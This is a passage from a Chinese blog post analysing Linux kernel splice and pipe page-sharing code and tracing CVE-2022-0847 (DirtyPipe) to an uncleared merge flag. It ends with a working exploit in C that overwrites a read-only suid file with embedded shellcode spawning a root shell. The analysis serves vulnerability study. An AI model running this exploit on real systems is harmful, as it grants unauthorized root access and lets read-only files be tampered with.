    obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
    obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

    obuf->len = len;
    ibuf->offset += len;
    ibuf->len -= len;
    o_len = len;
    o_head++;
    opipe->head = o_head;
    }
    ret += o_len;
    len -= o_len;
    } while (len);
    ......
    }

do_splice_from会调用到iter_file_splice_write.以io向量的形式拷贝pipe_buffer数据到文件中,没什么好分析的.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
ssize_t
iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
struct splice_desc sd = {
.total_len = len,
.flags = flags,
.pos = *ppos,
.u.file = out,
};
int nbufs = pipe->max_usage;
struct bio_vec *array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
ssize_t ret;

if (unlikely(!array))
return -ENOMEM;

pipe_lock(pipe);

splice_from_pipe_begin(&sd);
while (sd.total_len) {
struct iov_iter from;
unsigned int head, tail, mask;
size_t left;
int n;

ret = splice_from_pipe_next(pipe, &sd);
if (ret <= 0)
break;

if (unlikely(nbufs < pipe->max_usage)) {
kfree(array);
nbufs = pipe->max_usage;
array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
if (!array) {
ret = -ENOMEM;
break;
}
}

head = pipe->head;
tail = pipe->tail;
mask = pipe->ring_size - 1;

/* build the vector */
left = sd.total_len;
for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++, n++) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t this_len = buf->len;

if (this_len > left)
this_len = left;

ret = pipe_buf_confirm(pipe, buf);
if (unlikely(ret)) {
if (ret == -ENODATA)
ret = 0;
goto done;
}

array[n].bv_page = buf->page;
array[n].bv_len = this_len;
array[n].bv_offset = buf->offset;
left -= this_len;
}

iov_iter_bvec(&from, WRITE, array, n, sd.total_len - left);
ret = vfs_iter_write(out, &from, &sd.pos, 0);
if (ret <= 0)
break;

sd.num_spliced += ret;
sd.total_len -= ret;
*ppos = sd.pos;

/* dismiss the fully eaten buffers, adjust the partial one */
tail = pipe->tail;
while (ret) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
if (ret >= buf->len) {
ret -= buf->len;
buf->len = 0;
pipe_buf_release(pipe, buf);
tail++;
pipe->tail = tail;
if (pipe->files)
sd.need_wakeup = true;
} else {
buf->offset += ret;
buf->len -= ret;
ret = 0;
}
}
}
done:
kfree(array);
splice_from_pipe_end(pipe, &sd);

pipe_unlock(pipe);

if (sd.num_spliced)
ret = sd.num_spliced;

return ret;
}

EXPORT_SYMBOL(iter_file_splice_write);

do_splice_to会调用到copy_page_to_iter_pipe进行实际一页数据的拷贝.
这里使用的方式还是共享页面,将该文件缓存页与obuf共享.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

共享页面的安全性分析

可以看到splice调用中大量使用共享页面的形式完成数据的”拷贝”.但这种方式在直观上给人不安全的感觉.
详细分析一下三处共享页面.

初始状态,page蓝色部分代表buffer中已有的数据,白色部分表示空闲空间,红色部分表示本次要splice发送的数据.

第一处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
......
do {
......
ibuf = &ipipe->bufs[i_tail & i_mask];
obuf = &opipe->bufs[o_head & o_mask];

if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
}

拷贝完后是这样的.此时ibuf虽然还持有page的指针,但由于buf->op已经被清空,无法对page进行释放等操作,这一点上是安全的.再来分析两侧对page的读写能力.ibuf端tail已经前移,不能再读取该页,同时head==tail,也不能通过merge操作再次写入该页. 即ibuf端已经完全失去page的访问能力,即使obuf端能通过merge的方式再次写入该页,不会对ibuf端造成任何影响.

当然ibuf的head可能大于tail,此时虽然能进行merge操作但无法merge到已共享的那张page,仍不具有对它的访问能力.

第二处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
	/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;

/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;

还是先从释放等操作分析.这里由于只将ibuf->page中的部分数据发送了,所以ibuf需要继续持有该page.通过pipe_buf_get增加一次对page的引用,所以不会出现其中一端过早释放页面的情况.再来看读写能力,ibuf端可以继续正常读写(写是通过merge)该页.outbuf端由于清除了PIPE_BUF_FLAG_CAN_MERGE标志,只具有对该page的读能力.

ibuf端能写,obuf端能读,就有覆盖的风险,然而ibuf和obuf中独立的offset,len字段已经避免了这样的冲突(obuf端只能读红色区域,ibuf端只能写白色区域).

第三处

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;

首先有通过get_page增加页面引用,释放是安全的.
输入侧是file_cache,始终持有对该页面读的能力.
obuf侧可以读,但读收到obuf中offset,len字段的限制,安全.
但由于未清空PIPE_BUF_FLAG_CAN_MERGE位,obuf同时具有对该页面写的能力.

再来看读写的冲突.
file_cache读的范围是整张page,obuf写的范围是蓝色区域,明显存在冲突.对obuf的merge写能覆盖掉文件缓存.

CVE-2022-0847 DirtyPipe

DirtyPipe便是这个问题导致的.利用这个漏洞可以写入只读文件,如写入/etc/passwd或往suid的程序写入shellcode完成提权.

下面是一个简易的exp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#include <kernelpwn.h>


unsigned char shellcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

int main(int argc,char* argv[])
{
setvbuf(stdout,_IONBF,0,0);
setvbuf(stderr,_IONBF,0,0);

if(argc != 2)
{
loge("usage: ./exploit [target]");
exit(0);
}

char* targetFile = argv[1];

int targetFd = open(targetFile,O_RDONLY);
if(targetFd < 0)
err_exit("open targetFile");

int pipeFd[2];
pipe(pipeFd);

//将pipe写满再读出,使每一个pipe_buffer带上PIPE_BUF_FLAG_CAN_MERGE标志
char buf[PAGE_SIZE];
size_t totalSize = 16*PAGE_SIZE;
size_t ret_sz;
while (totalSize)
{
ret_sz = write(pipeFd[1],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

totalSize = 16*PAGE_SIZE;
while (totalSize)
{
ret_sz = read(pipeFd[0],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

//触发漏洞
int ret = splice(targetFd,NULL,pipeFd[1],NULL,1,0);
if(ret < 0)
err_exit("splice");

//写入目标文件
ret = write(pipeFd[1],shellcode+1,sizeof(shellcode)-1);
logd("write %d",ret);

system(targetFile);

return 0;
}
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信